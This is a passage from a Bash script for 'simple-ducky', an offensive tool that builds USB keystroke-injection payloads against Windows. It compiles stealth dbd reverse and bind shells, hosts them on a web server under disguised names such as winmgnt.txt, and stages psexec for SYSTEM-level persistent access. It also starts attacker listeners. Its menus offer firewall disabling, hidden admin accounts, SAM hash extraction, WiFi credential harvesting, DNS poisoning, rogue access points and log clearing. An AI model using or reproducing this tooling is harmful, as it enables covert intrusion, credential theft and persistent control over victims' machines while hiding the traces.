| make mingw-cross CFLAGS=-DSTEALTH | |
| cp /usr/share/simple-ducky/misc/dbd/dbd.exe /var/www/winmgnt.txt | |
| cp /usr/share/simple-ducky/misc/psexec.exe /var/www/taskmgnt.txt | |
| rm dbd.exe | |
| cd /usr/share/simple-ducky | |
| fi | |
| echo -e "" | |
| echo -e "\e[1;34mDone!\e[0m" | |
| sleep 3 | |
| clear | |
| echo -e "\e[1;34mNow let's build your inject.bin\e[0m" | |
| echo "" | |
| echo -e "\e[1;34mWhat is the IP/Domain address for your webserver?\e[0m" | |
| read -p "[Example: www.example.com | www.example.com:port | 192.168.1.100 ] " webserverip | |
| echo "" | |
| echo -e "How long of a delay would like before starting? " | |
| read -p "Use Milliseconds (15000 ms = 15 sec) " pausemilsec | |
| echo "" | |
| clear | |
| echo -e "\e[1;34mPlease wait, generating your inject.bin\e[0m" | |
| echo "" | |
| sed "/http/s/domain/$webserverip/g" /usr/share/simple-ducky/payloads/windowsdbdVIS7uac.conf > /usr/share/simple-ducky/payload.txt | |
| sed -i "1iDELAY $pausemilsec" /usr/share/simple-ducky/payload.txt | |
| rm /usr/share/simple-ducky/payload_del1.conf | |
| clear | |
| read -p "Would you like to use a US keyboard a different format [Enter=US|o=other]? " language | |
| if [ "$language" == "o" ]; then | |
| function_lan | |
| read -p "Option: " keyboard | |
| clear | |
| echo -e "\e[1;34mGenerating your inject.bin file...\e[0m" | |
| echo "" | |
| sleep 2 | |
| java -jar encoder.jar -i payload.txt -l $keyboard -o inject.bin | |
| echo "" | |
| echo -e "\e[1;34mYour payload has been created, its located in /usr/share/simple-ducky\e[0m" | |
| echo "" | |
| echo -e "\e[1;34mYour evil executable has been created, it is in located at /var/www/winmgmt.exe\e[0m" | |
| echo "" | |
| read -p "Press any key to contiue" enter | |
| else | |
| clear | |
| echo -e "\e[1;34mGenerating your inject.bin file...\e[0m" | |
| echo "" | |
| sleep 2 | |
| java -jar encoder.jar -i payload.txt -o inject.bin | |
| echo "" | |
| echo -e "\e[1;34mYour payload has been created, its located in /usr/share/simple-ducky\e[0m" | |
| echo "" | |
| echo -e "\e[1;34mYour evil executable has been created, it is in located at /var/www/winmgmt.exe\e[0m" | |
| echo "" | |
| read -p "Press any key to contiue" enter | |
| fi | |
| clear | |
| if [ "$payloadtype" == "rev" ]; then | |
| read -p "Would you like me to setup a listener [y/n]? " listener | |
| clear | |
| if [ "$listener" == "n" ]; then | |
| read -p "Would you like to return to the main menu [y/n]? " option | |
| elif [ "$listener" == "y" ]; then | |
| xdg-open /usr/share/simple-ducky/ & | |
| service apache2 start | |
| clear | |
| chmod +x /usr/share/simple-ducky/misc/dbd/binaries/dbd | |
| cp /usr/share/simple-ducky/misc/dbd/binaries/dbd /usr/bin/dbd | |
| dbd -lvp $attackerport -k $attackersecret | |
| fi | |
| elif [ "$payloadtype" == "bind" ]; then | |
| echo -e "\e[1;34mWhen you are ready to connect to the victim, in your terminal enter:\e[0m" | |
| echo "dbd -nv victim.host.orip $victimport -k $attackersecret" | |
| echo "" | |
| read -p "Press any key to contiue" enter | |
| clear | |
| read -p "Would you like to return to the main menu [y/n]? " option | |
| fi | |
| case $option in | |
| y) simple-ducky ;; | |
| n) clear;exit ;; | |
| *) clear;exit ;; | |
| esac | |
| } | |
| ################################################################################# | |
| # DBD Shell w/oUAC (Admin Priv Shell|Win Vista/7) | |
| ################################################################################# | |
| f_windowsdbdVIS7nouac(){ | |
| clear | |
| echo -e "\e[1;31mDescription:\e[0m This payload uses a custom dbd executable (bind/reverse shell) and psexec to give the attacker a persistent shell with NT/SYSTEM ACCESS!! DBD uses a 128bit secure connection! In addition a task is scheduled to relaunch the shell every time a new user logs in. " | |
| echo -e "\e[1;31mNote:\e[0m Special thanks to durandal for developing dbd and helping me fine tune this incredible fast and powerful payload" | |
| echo -e "\e[1;31mTarget:\e[0m Windows Vista/7 w/o UAC Enabled" | |
| echo -e "\e[1;31mAuthor:\e[0m skysploit " | |
| echo "" | |
| echo "" | |
| echo -e "\e[1;34mLets start by building your evil executable\e[0m" | |
| echo "" | |
| read -p "Would you like a reverse or bind shell [rev|bind]? " payloadtype | |
| echo "" | |
| if [ "$payloadtype" == "rev" ]; then | |
| read -p "Where shall I send your persistent shell? " attackerip | |
| echo "" | |
| read -p "What port will you be listening on? " attackerport | |
| echo "" | |
| read -p "What would you like the shared secret to be on your secure connection? " attackersecret | |
| echo "" | |
| echo -e "\e[1;34mBuilding your custom dbd payload, this will take a moment...\e[0m" | |
| sleep 3 | |
| sed "/HOST/s/attackerip/$attackerip/g" /usr/share/simple-ducky/misc/dbd/conf/dbd_win_reverse.conf > /usr/share/simple-ducky/misc/dbd/dbd_win_reverse1.conf | |
| sed "/PORT/s/attackerport/$attackerport/g" /usr/share/simple-ducky/misc/dbd/dbd_win_reverse1.conf > /usr/share/simple-ducky/misc/dbd/dbd_win_reverse2.conf | |
| sed "/SHARED_SECRET/s/attackersecret/$attackersecret/g" /usr/share/simple-ducky/misc/dbd/dbd_win_reverse2.conf > /usr/share/simple-ducky/misc/dbd/dbd.h | |
| rm /usr/share/simple-ducky/misc/dbd/dbd_win_reverse1.conf | |
| rm /usr/share/simple-ducky/misc/dbd/dbd_win_reverse2.conf | |
| cd /usr/share/simple-ducky/misc/dbd/ | |
| make mingw-cross CFLAGS=-DSTEALTH | |
| cp /usr/share/simple-ducky/misc/dbd/dbd.exe /var/www/winmgnt.txt | |
| cp /usr/share/simple-ducky/misc/psexec.exe /var/www/taskmgnt.txt | |
| rm dbd.exe | |
| cd /usr/share/simple-ducky | |
| elif [ "$payloadtype" == "bind" ]; then | |
| read -p "What port do you want the victim to be listening on? " victimport | |
| echo "" | |
| read -p "What would you like the shared secret to be on your secure connection? " attackersecret | |
| echo "" | |
| echo -e "\e[1;34mBuilding your custom dbd payload, this will take a moment...\e[0m" | |
| sleep 3 | |
| sed "/HOST/s/victimport/$victimport/g" /usr/share/simple-ducky/misc/dbd/conf/dbd_win_bind.conf > /usr/share/simple-ducky/misc/dbd/dbd_win_bind1.conf | |
| sed "/SHARED_SECRET/s/attackersecret/$attackersecret/g" /usr/share/simple-ducky/misc/dbd/dbd_win_bind1.conf > /usr/share/simple-ducky/misc/dbd/dbd.h | |
| rm /usr/share/simple-ducky/misc/dbd/dbd_win_bind1.conf | |
| cd /usr/share/simple-ducky/misc/dbd/ | |
| make mingw-cross CFLAGS=-DSTEALTH | |
| cp /usr/share/simple-ducky/misc/dbd/dbd.exe /var/www/winmgnt.txt | |
| cp /usr/share/simple-ducky/misc/psexec.exe /var/www/taskmgnt.txt | |
| rm dbd.exe | |
| cd /usr/share/simple-ducky | |
| fi | |
| echo -e "" | |
| echo -e "\e[1;34mDone!\e[0m" | |
| sleep 3 | |
| clear | |
| echo -e "\e[1;34mNow let's build your inject.bin\e[0m" | |
| echo "" | |
| echo -e "\e[1;34mWhat is the IP/Domain address for your webserver?\e[0m" | |
| read -p "[Example: www.example.com | www.example.com:port | 192.168.1.100 ] " webserverip | |
| echo "" | |
| echo -e "How long of a delay would like before starting? " | |
| read -p "Use Milliseconds (15000 ms = 15 sec) " pausemilsec | |
| echo "" | |
| clear | |
| echo -e "\e[1;34mPlease wait, generating your inject.bin\e[0m" | |
| echo "" | |
| sed "/http/s/domain/$webserverip/g" /usr/share/simple-ducky/payloads/windowsdbdVIS7nouac.conf > /usr/share/simple-ducky/payload.txt | |
| sed -i "1iDELAY $pausemilsec" /usr/share/simple-ducky/payload.txt | |
| rm /usr/share/simple-ducky/payload_del1.conf | |
| clear | |
| read -p "Would you like to use a US keyboard a different format [Enter=US|o=other]? " language | |
| if [ "$language" == "o" ]; then | |
| function_lan | |
| read -p "Option: " keyboard | |
| clear | |
| echo -e "\e[1;34mGenerating your inject.bin file...\e[0m" | |
| echo "" | |
| sleep 2 | |
| java -jar encoder.jar -i payload.txt -l $keyboard -o inject.bin | |
| echo "" | |
| echo -e "\e[1;34mYour payload has been created, its located in /usr/share/simple-ducky\e[0m" | |
| echo "" | |
| echo -e "\e[1;34mYour evil executable has been created, it is in located at /var/www/winmgmt.exe\e[0m" | |
| echo "" | |
| read -p "Press any key to contiue" enter | |
| else | |
| clear | |
| echo -e "\e[1;34mGenerating your inject.bin file...\e[0m" | |
| echo "" | |
| sleep 2 | |
| java -jar encoder.jar -i payload.txt -o inject.bin | |
| echo "" | |
| echo -e "\e[1;34mYour payload has been created, its located in /usr/share/simple-ducky\e[0m" | |
| echo "" | |
| echo -e "\e[1;34mYour evil executable has been created, it is in located at /var/www/winmgmt.exe\e[0m" | |
| echo "" | |
| read -p "Press any key to contiue" enter | |
| fi | |
| clear | |
| if [ "$payloadtype" == "rev" ]; then | |
| read -p "Would you like me to setup a listener [y/n]? " listener | |
| clear | |
| if [ "$listener" == "n" ]; then | |
| read -p "Would you like to return to the main menu [y/n]? " option | |
| elif [ "$listener" == "y" ]; then | |
| xdg-open /usr/share/simple-ducky/ & | |
| service apache2 start | |
| clear | |
| chmod +x /usr/share/simple-ducky/misc/dbd/binaries/dbd | |
| cp /usr/share/simple-ducky/misc/dbd/binaries/dbd /usr/bin/dbd | |
| dbd -lvp $attackerport -k $attackersecret | |
| fi | |
| elif [ "$payloadtype" == "bind" ]; then | |
| echo -e "\e[1;34mWhen you are ready to connect to the victim, in your terminal enter:\e[0m" | |
| echo "dbd -nv victim.host.orip $victimport -k $attackersecret" | |
| echo "" | |
| read -p "Press any key to contiue" enter | |
| clear | |
| read -p "Would you like to return to the main menu [y/n]? " option | |
| fi | |
| case $option in | |
| y) simple-ducky ;; | |
| n) clear;exit ;; | |
| *) clear;exit ;; | |
| esac | |
| } | |
| ################################################################################# | |
| # DBD Shell w/UAC (Admin Priv Shell|Windows 8) | |
| ################################################################################# | |
| f_windowsdbdwin8uac(){ | |
| clear | |
| echo -e "\e[1;31mDescription:\e[0m This payload uses a custom dbd executable (bind/reverse shell) and psexec to give the attacker a persistent shell with NT/SYSTEM ACCESS!! DBD uses a 128bit secure connection! In addition a task is scheduled to relaunch the shell every time a new user logs in. " | |
| echo -e "\e[1;31mNote:\e[0m Special thanks to durandal for developing dbd and helping me fine tune this incredible fast and powerful payload" | |
| echo -e "\e[1;31mTarget:\e[0m Windows Windows 8 w/UAC Enabled" | |
| echo -e "\e[1;31mAuthor:\e[0m skysploit " | |
| echo "" | |
| echo "" | |
| echo -e "\e[1;34mLets start by building your evil executable\e[0m" | |
| echo "" | |
| read -p "Would you like a reverse or bind shell [rev|bind]? " payloadtype | |
| echo "" | |
| if [ "$payloadtype" == "rev" ]; then | |
| read -p "Where shall I send your persistent shell? " attackerip | |
| echo "" | |
| read -p "What port will you be listening on? " attackerport | |
| echo "" | |
| read -p "What would you like the shared secret to be on your secure connection? " attackersecret | |
| echo "" | |
| echo -e "\e[1;34mBuilding your custom dbd payload, this will take a moment...\e[0m" | |
| sleep 3 | |
| sed "/HOST/s/attackerip/$attackerip/g" /usr/share/simple-ducky/misc/dbd/conf/dbd_win_reverse.conf > /usr/share/simple-ducky/misc/dbd/dbd_win_reverse1.conf | |
| sed "/PORT/s/attackerport/$attackerport/g" /usr/share/simple-ducky/misc/dbd/dbd_win_reverse1.conf > /usr/share/simple-ducky/misc/dbd/dbd_win_reverse2.conf | |
| sed "/SHARED_SECRET/s/attackersecret/$attackersecret/g" /usr/share/simple-ducky/misc/dbd/dbd_win_reverse2.conf > /usr/share/simple-ducky/misc/dbd/dbd.h | |
| rm /usr/share/simple-ducky/misc/dbd/dbd_win_reverse1.conf | |
| rm /usr/share/simple-ducky/misc/dbd/dbd_win_reverse2.conf | |
| cd /usr/share/simple-ducky/misc/dbd/ | |
| make mingw-cross CFLAGS=-DSTEALTH | |
| cp /usr/share/simple-ducky/misc/dbd/dbd.exe /var/www/winmgnt.txt | |
| cp /usr/share/simple-ducky/misc/psexec.exe /var/www/taskmgnt.txt | |
| rm dbd.exe | |
| cd /usr/share/simple-ducky | |
| elif [ "$payloadtype" == "bind" ]; then | |
| read -p "What port do you want the victim to be listening on? " victimport | |
| echo "" | |
| read -p "What would you like the shared secret to be on your secure connection? " attackersecret | |
| echo "" | |
| echo -e "\e[1;34mBuilding your custom dbd payload, this will take a moment...\e[0m" | |
| sleep 3 | |
| sed "/HOST/s/victimport/$victimport/g" /usr/share/simple-ducky/misc/dbd/conf/dbd_win_bind.conf > /usr/share/simple-ducky/misc/dbd/dbd_win_bind1.conf | |
| sed "/SHARED_SECRET/s/attackersecret/$attackersecret/g" /usr/share/simple-ducky/misc/dbd/dbd_win_bind1.conf > /usr/share/simple-ducky/misc/dbd/dbd.h | |
| rm /usr/share/simple-ducky/misc/dbd/dbd_win_bind1.conf | |
| cd /usr/share/simple-ducky/misc/dbd/ | |
| make mingw-cross CFLAGS=-DSTEALTH | |
| cp /usr/share/simple-ducky/misc/dbd/dbd.exe /var/www/winmgnt.txt | |
| cp /usr/share/simple-ducky/misc/psexec.exe /var/www/taskmgnt.txt | |
| rm dbd.exe | |
| cd /usr/share/simple-ducky | |
| fi | |
| echo -e "" | |
| echo -e "\e[1;34mDone!\e[0m" | |
| sleep 3 | |
| clear | |
| echo -e "\e[1;34mNow let's build your inject.bin\e[0m" | |
| echo "" | |
| echo -e "\e[1;34mWhat is the IP/Domain address for your webserver?\e[0m" | |
| read -p "[Example: www.example.com | www.example.com:port | 192.168.1.100 ] " webserverip | |
| echo "" | |
| echo -e "How long of a delay would like before starting? " | |
| read -p "Use Milliseconds (15000 ms = 15 sec) " pausemilsec | |
| echo "" | |
| clear | |
| echo -e "\e[1;34mPlease wait, generating your inject.bin\e[0m" | |
| echo "" | |
| sed "/http/s/domain/$webserverip/g" /usr/share/simple-ducky/payloads/windowsdbdWIN8uac.conf > /usr/share/simple-ducky/payload.txt | |
| sed -i "1iDELAY $pausemilsec" /usr/share/simple-ducky/payload.txt | |
| rm /usr/share/simple-ducky/payload_del1.conf | |
| clear | |
| read -p "Would you like to use a US keyboard a different format [Enter=US|o=other]? " language | |
| if [ "$language" == "o" ]; then | |
| function_lan | |
| read -p "Option: " keyboard | |
| clear | |
| echo -e "\e[1;34mGenerating your inject.bin file...\e[0m" | |
| echo "" | |
| sleep 2 | |
| java -jar encoder.jar -i payload.txt -l $keyboard -o inject.bin | |
| echo "" | |
| echo -e "\e[1;34mYour payload has been created, its located in /usr/share/simple-ducky\e[0m" | |
| echo "" | |
| echo -e "\e[1;34mYour evil executable has been created, it is in located at /var/www/winmgmt.exe\e[0m" | |
| echo "" | |
| read -p "Press any key to contiue" enter | |
| else | |
| clear | |
| echo -e "\e[1;34mGenerating your inject.bin file...\e[0m" | |
| echo "" | |
| sleep 2 | |
| java -jar encoder.jar -i payload.txt -o inject.bin | |
| echo "" | |
| echo -e "\e[1;34mYour payload has been created, its located in /usr/share/simple-ducky\e[0m" | |
| echo "" | |
| echo -e "\e[1;34mYour evil executable has been created, it is in located at /var/www/winmgmt.exe\e[0m" | |
| echo "" | |
| read -p "Press any key to contiue" enter | |
| fi | |
| clear | |
| if [ "$payloadtype" == "rev" ]; then | |
| read -p "Would you like me to setup a listener [y/n]? " listener | |
| clear | |
| if [ "$listener" == "n" ]; then | |
| read -p "Would you like to return to the main menu [y/n]? " option | |
| elif [ "$listener" == "y" ]; then | |
| xdg-open /usr/share/simple-ducky/ & | |
| service apache2 start | |
| clear | |
| chmod +x /usr/share/simple-ducky/misc/dbd/binaries/dbd | |
| cp /usr/share/simple-ducky/misc/dbd/binaries/dbd /usr/bin/dbd | |
| dbd -lvp $attackerport -k $attackersecret | |
| fi | |
| elif [ "$payloadtype" == "bind" ]; then | |
| echo -e "\e[1;34mWhen you are ready to connect to the victim, in your terminal enter:\e[0m" | |
| echo "dbd -nv victim.host.orip $victimport -k $attackersecret" | |
| echo "" | |
| read -p "Press any key to contiue" enter | |
| clear | |
| read -p "Would you like to return to the main menu [y/n]? " option | |
| fi | |
| case $option in | |
| y) simple-ducky ;; | |
| n) clear;exit ;; | |
| *) clear;exit ;; | |
| esac | |
| } | |
| ################################################################################# | |
| # DBD Shell w/o UAC (Admin Priv Shell|Windows 8) | |
| ################################################################################# | |
| f_windowsdbdwin8nouac(){ | |
| clear | |
| echo -e "\e[1;31mDescription:\e[0m This payload uses a custom dbd executable (bind/reverse shell) and psexec to give the attacker a persistent shell with NT/SYSTEM ACCESS!! DBD uses a 128bit secure connection! In addition a task is scheduled to relaunch the shell every time a new user logs in. " | |
| echo -e "\e[1;31mNote:\e[0m Special thanks to durandal for developing dbd and helping me fine tune this incredible fast and powerful payload" | |
| echo -e "\e[1;31mTarget:\e[0m Windows Windows 8 w/o UAC Enabled" | |
| echo -e "\e[1;31mAuthor:\e[0m skysploit " | |
| echo "" | |
| echo "" | |
| echo -e "\e[1;34mLets start by building your evil executable\e[0m" | |
| echo "" | |
| read -p "Would you like a reverse or bind shell [rev|bind]? " payloadtype | |
| echo "" | |
| if [ "$payloadtype" == "rev" ]; then | |
| read -p "Where shall I send your persistent shell? " attackerip | |
| echo "" | |
| read -p "What port will you be listening on? " attackerport | |
| echo "" | |
| read -p "What would you like the shared secret to be on your secure connection? " attackersecret | |
| echo "" | |
| echo -e "\e[1;34mBuilding your custom dbd payload, this will take a moment...\e[0m" | |
| sleep 3 | |
| sed "/HOST/s/attackerip/$attackerip/g" /usr/share/simple-ducky/misc/dbd/conf/dbd_win_reverse.conf > /usr/share/simple-ducky/misc/dbd/dbd_win_reverse1.conf | |
| sed "/PORT/s/attackerport/$attackerport/g" /usr/share/simple-ducky/misc/dbd/dbd_win_reverse1.conf > /usr/share/simple-ducky/misc/dbd/dbd_win_reverse2.conf | |
| sed "/SHARED_SECRET/s/attackersecret/$attackersecret/g" /usr/share/simple-ducky/misc/dbd/dbd_win_reverse2.conf > /usr/share/simple-ducky/misc/dbd/dbd.h | |
| rm /usr/share/simple-ducky/misc/dbd/dbd_win_reverse1.conf | |
| rm /usr/share/simple-ducky/misc/dbd/dbd_win_reverse2.conf | |
| cd /usr/share/simple-ducky/misc/dbd/ | |
| make mingw-cross CFLAGS=-DSTEALTH | |
| cp /usr/share/simple-ducky/misc/dbd/dbd.exe /var/www/winmgnt.txt | |
| cp /usr/share/simple-ducky/misc/psexec.exe /var/www/taskmgnt.txt | |
| rm dbd.exe | |
| cd /usr/share/simple-ducky | |
| elif [ "$payloadtype" == "bind" ]; then | |
| read -p "What port do you want the victim to be listening on? " victimport | |
| echo "" | |
| read -p "What would you like the shared secret to be on your secure connection? " attackersecret | |
| echo "" | |
| echo -e "\e[1;34mBuilding your custom dbd payload, this will take a moment...\e[0m" | |
| sleep 3 | |
| sed "/HOST/s/victimport/$victimport/g" /usr/share/simple-ducky/misc/dbd/conf/dbd_win_bind.conf > /usr/share/simple-ducky/misc/dbd/dbd_win_bind1.conf | |
| sed "/SHARED_SECRET/s/attackersecret/$attackersecret/g" /usr/share/simple-ducky/misc/dbd/dbd_win_bind1.conf > /usr/share/simple-ducky/misc/dbd/dbd.h | |
| rm /usr/share/simple-ducky/misc/dbd/dbd_win_bind1.conf | |
| cd /usr/share/simple-ducky/misc/dbd/ | |
| make mingw-cross CFLAGS=-DSTEALTH | |
| cp /usr/share/simple-ducky/misc/dbd/dbd.exe /var/www/winmgnt.txt | |
| cp /usr/share/simple-ducky/misc/psexec.exe /var/www/taskmgnt.txt | |
| rm dbd.exe | |
| cd /usr/share/simple-ducky | |
| fi | |
| echo -e "" | |
| echo -e "\e[1;34mDone!\e[0m" | |
| sleep 3 | |
| clear | |
| echo -e "\e[1;34mNow let's build your inject.bin\e[0m" | |
| echo "" | |
| echo -e "\e[1;34mWhat is the IP/Domain address for your webserver?\e[0m" | |
| read -p "[Example: www.example.com | www.example.com:port | 192.168.1.100 ] " webserverip | |
| echo "" | |
| echo -e "How long of a delay would like before starting? " | |
| read -p "Use Milliseconds (15000 ms = 15 sec) " pausemilsec | |
| echo "" | |
| clear | |
| echo -e "\e[1;34mPlease wait, generating your inject.bin\e[0m" | |
| echo "" | |
| sed "/http/s/domain/$webserverip/g" /usr/share/simple-ducky/payloads/windowsdbdWIN8nouac.conf > /usr/share/simple-ducky/payload.txt | |
| sed -i "1iDELAY $pausemilsec" /usr/share/simple-ducky/payload.txt | |
| rm /usr/share/simple-ducky/payload_del1.conf | |
| clear | |
| read -p "Would you like to use a US keyboard a different format [Enter=US|o=other]? " language | |
| if [ "$language" == "o" ]; then | |
| function_lan | |
| read -p "Option: " keyboard | |
| clear | |
| echo -e "\e[1;34mGenerating your inject.bin file...\e[0m" | |
| echo "" | |
| sleep 2 | |
| java -jar encoder.jar -i payload.txt -l $keyboard -o inject.bin | |
| echo "" | |
| echo -e "\e[1;34mYour payload has been created, its located in /usr/share/simple-ducky\e[0m" | |
| echo "" | |
| echo -e "\e[1;34mYour evil executable has been created, it is in located at /var/www/winmgmt.exe\e[0m" | |
| echo "" | |
| read -p "Press any key to contiue" enter | |
| else | |
| clear | |
| echo -e "\e[1;34mGenerating your inject.bin file...\e[0m" | |
| echo "" | |
| sleep 2 | |
| java -jar encoder.jar -i payload.txt -o inject.bin | |
| echo "" | |
| echo -e "\e[1;34mYour payload has been created, its located in /usr/share/simple-ducky\e[0m" | |
| echo "" | |
| echo -e "\e[1;34mYour evil executable has been created, it is in located at /var/www/winmgmt.exe\e[0m" | |
| echo "" | |
| read -p "Press any key to contiue" enter | |
| fi | |
| clear | |
| if [ "$payloadtype" == "rev" ]; then | |
| read -p "Would you like me to setup a listener [y/n]? " listener | |
| clear | |
| if [ "$listener" == "n" ]; then | |
| read -p "Would you like to return to the main menu [y/n]? " option | |
| elif [ "$listener" == "y" ]; then | |
| xdg-open /usr/share/simple-ducky/ & | |
| service apache2 start | |
| clear | |
| chmod +x /usr/share/simple-ducky/misc/dbd/binaries/dbd | |
| cp /usr/share/simple-ducky/misc/dbd/binaries/dbd /usr/bin/dbd | |
| dbd -lvp $attackerport -k $attackersecret | |
| fi | |
| elif [ "$payloadtype" == "bind" ]; then | |
| echo -e "\e[1;34mWhen you are ready to connect to the victim, in your terminal enter:\e[0m" | |
| echo "dbd -nv victim.host.orip $victimport -k $attackersecret" | |
| echo "" | |
| read -p "Press any key to contiue" enter | |
| clear | |
| read -p "Would you like to return to the main menu [y/n]? " option | |
| fi | |
| case $option in | |
| y) simple-ducky ;; | |
| n) clear;exit ;; | |
| *) clear;exit ;; | |
| esac | |
| } | |
| ################################################################################# | |
| # Payload Builder Banner | |
| ################################################################################# | |
| f_payloadbuilderbanner(){ | |
| clear | |
| echo -e "\e[1;31mWelcome to the Payload builder!\e[0m " | |
| echo -e 'Here every payload that the simple-ducky offers has been broken down by OS and permission level of the victim. In addition the options have been placed into three categories; Pre-Attack, Main-Attack and Post-Attack. Use as many or few as you would like.' | |
| echo -e "If you would like to contribute your payload contact the author at skysploit@gmail.com" | |
| echo -e "\e[1;31mAuthor:\e[0m Travis Weathers (skysploit)" | |
| echo -e "" | |
| } | |
| ######################################################################################################## | |
| # Payload Builder Menu | |
| ######################################################################################################## | |
| f_payloadbuilder(){ | |
| clear | |
| f_payloadbuilderbanner | |
| echo "" | |
| echo -e "\e[1;34mPlease select the Windows OS that you would like to target...\e[0m" | |
| echo "" | |
| echo "1. Windows XP & derivatives (User/Admin Access)" | |
| echo "2. Windows Vista/7 & derivatives (User Access)" | |
| echo "3. Windows Vista/7 & derivatives (Admin Access)" | |
| echo "4. Windows 8 & derivatives (User Access)" | |
| echo "5. Windows 8 & derivatives (Admin Access)" | |
| echo "6. Return to the Main Menu" | |
| echo "" | |
| read -p "Option: " osselect | |
| if [ "$osselect" == "1" ]; then | |
| cat /usr/share/simple-ducky/payloads/builder/os-select/xpusrall.conf > /usr/share/simple-ducky/payload.txt | |
| elif [ "$osselect" == "2" ]; then | |
| cat /usr/share/simple-ducky/payloads/builder/os-select/win7usr.conf > /usr/share/simple-ducky/payload.txt | |
| elif [ "$osselect" == "3" ]; then | |
| echo "" | |
| read -p "Is User Access Control (UAC) enabled on the victims machine [y|n]? " uacenabled | |
| if [ "$uacenabled" == "y" ]; then | |
| cat /usr/share/simple-ducky/payloads/builder/os-select/win7admuac.conf > /usr/share/simple-ducky/payload.txt | |
| elif [ "$uacenabled" == "n" ]; then | |
| cat /usr/share/simple-ducky/payloads/builder/os-select/win7admnouac.conf > /usr/share/simple-ducky/payload.txt | |
| fi | |
| elif [ "$osselect" == "4" ]; then | |
| cat /usr/share/simple-ducky/payloads/builder/os-select/win8usr.conf > /usr/share/simple-ducky/payload.txt | |
| elif [ "$osselect" == "5" ]; then | |
| echo "" | |
| read -p "Is User Access Control (UAC) enabled on the victims machine [y|n]? " uacenabled | |
| if [ "$uacenabled" == "y" ]; then | |
| cat /usr/share/simple-ducky/payloads/builder/os-select/win8admuac.conf > /usr/share/simple-ducky/payload.txt | |
| elif [ "$uacenabled" == "n" ]; then | |
| cat /usr/share/simple-ducky/payloads/builder/os-select/win8admnouac.conf > /usr/share/simple-ducky/payload.txt | |
| fi | |
| elif [ "$osselect" == "6" ]; then | |
| f_mainmenu | |
| fi | |
| echo >> /usr/share/simple-ducky/payload.txt | |
| f_preattackadd | |
| } | |
| ############## Pre Attack Functions ######################## | |
| f_preattackadd(){ | |
| if [[ $osselect = 1 || $osselect = 3 || $osselect = 5 ]] ; then | |
| clear | |
| echo -e "\e[1;34mLets add some pre attack functions...\e[0m" | |
| echo "" | |
| echo "1. Minimize the command prompt (recommended for large payloads)" | |
| echo "2. Disable the Windows Firewall" | |
| echo "3. Enable Remote Desktop and Remote Assistance" | |
| echo "4. Create and hide an Admin User" | |
| echo "5. Continue to Attack Functions" | |
| echo "" | |
| read -p "Option: " preattack | |
| case $preattack in | |
| 1) f_minimizecmd ;; | |
| 2) f_disablefirewall ;; | |
| 3) f_enablerdp ;; | |
| 4) f_createusr ;; | |
| 5) f_attackadd ;; | |
| *) clear;exit ;; | |
| esac | |
| elif [[ $osselect = 2 || $osselect = 4 ]]; then | |
| clear | |
| echo "" | |
| echo -e "\e[1;34mLets add some pre attack functions...\e[0m" | |
| echo "" | |
| echo "1. Minimize the command prompt (recommended for large payloads)" | |
| echo "2. Continue to Attack Functions" | |
| echo "" | |
| read -p "Option: " preattack | |
| case $preattack in | |
| 1) f_minimizecmd ;; | |
| 2) f_attackadd ;; | |
| *) clear;exit ;; | |
| esac | |
| fi | |
| } | |
| ############## Attack Functions ######################## | |
| f_attackadd(){ | |
| if [[ $osselect = 3 || $osselect = 5 ]]; then | |
| clear | |
| echo -e "\e[1;34mMain Attack Functions...\e[0m" | |
| echo "" | |
| echo "1. Extract SAM & SYSTEM (VSSOwn.vbs)" | |
| echo "2. Shells with Powershell; (Metasploit, Ncat, DBD, Custom User Defined)" | |
| echo "3. Proxy in the Middle (PiTM)" | |
| echo "4. WiFi Credential Harvester" | |
| echo "5. Rouge Access Point" | |
| echo "6. Auto Associate to Rogue Access Point" | |
| echo "7. Local DNS Poisoning" | |
| echo "8. Download & Execute JAR" | |
| echo "9. Post Attack Options" | |
| echo "" | |
| read -p "Option: " mainattack | |
| case $mainattack in | |
| 1) f_extracthash ;; | |
| 2) f_revshells ;; | |
| 3) f_pitmattack ;; | |
| 4) f_wificreds ;; | |
| 5) f_rogueaccess ;; | |
| 6) f_autoassociate ;; | |
| 7) f_dnspoison ;; | |
| 8) f_jarexecute ;; | |
| 9) f_postattackadd ;; | |
| *) clear;exit ;; | |
| esac | |
| elif [ "$osselect" == "1" ]; then | |
| clear | |
| echo -e "\e[1;34mMain Attack Functions...\e[0m" | |
| echo "" | |
| echo "1. Reverse Shell (No Download)" | |
| echo "2. Proxy in the Middle (PiTM)" | |
| echo "3. WiFi Credential Harvester" | |
| echo "4. Rouge Access Point" | |
| echo "5. Local DNS Poisoning" | |
| echo "6. Post Attack Options" | |
| echo "" | |
| read -p "Option: " mainattack | |
| case $mainattack in | |
| 1) f_revshells ;; | |
| 2) f_pitmattack ;; | |
| 3) f_wificreds ;; | |
| 4) f_rogueaccess ;; | |
| 5) f_dnspoison ;; | |
| 6) f_postattackadd ;; | |
| *) clear;exit ;; | |
| esac | |
| elif [[ $osselect == 2 || $osselect = 4 ]]; then | |
| clear | |
| echo -e "\e[1;34mMain Attack Functions...\e[0m" | |
| echo "" | |
| echo "1. Shells with Powershell; (Metasploit, Ncat, DBD, Custom User Defined)" | |
| echo "2. Proxy in the Middle (PiTM)" | |
| echo "3. WiFi Credential Harvester" | |
| echo "4. Rouge Access Point" | |
| echo "5. Auto Associate to Rogue Access Point" | |
| echo "6. Post Attack Options" | |
| echo "" | |
| read -p "Option: " mainattack | |
| case $mainattack in | |
| 1) f_revshells ;; | |
| 2) f_pitmattack ;; | |
| 3) f_wificreds ;; | |
| 4) f_rogueaccess ;; | |
| 5) f_autoassociate ;; | |
| 6) f_postattackadd ;; | |
| *) clear;exit ;; | |
| esac | |
| fi | |
| } | |
| ############## Post Attack Functions ######################## | |
| f_postattackadd(){ | |
| if [[ $osselect = 3 || $osselect = 5 ]]; then | |
| clear | |
| echo -e "\e[1;34mPost Attack Functions...\e[0m" | |
| echo "" | |
| echo "1. Clear all Logs" | |
| echo "2. Create Inject.bin" | |
| echo "" | |
| read -p "Option: " postattack | |
| case $postattack in | |
| 1) f_clearlogs ;; | |
| 2) f_injectcreate ;; | |
| *) clear;exit ;; | |
| esac | |
| elif [[ $osselect = 2 || $osselect = 4 ]]; then | |
| clear | |
| echo -e "\e[1;34mThere are no post attack options for user level access. Finalizing the payload...\e[0m" | |
| echo "" | |
| sleep 4 | |
| f_injectcreate | |
| elif [ "$osselect" == "1" ]; then | |
| clear | |
| echo -e "\e[1;34mThere are no post attack options for XP. Finalizing the payload...\e[0m" | |
| echo "" | |
| sleep 4 | |
| f_injectcreate | |
| fi | |
| } | |
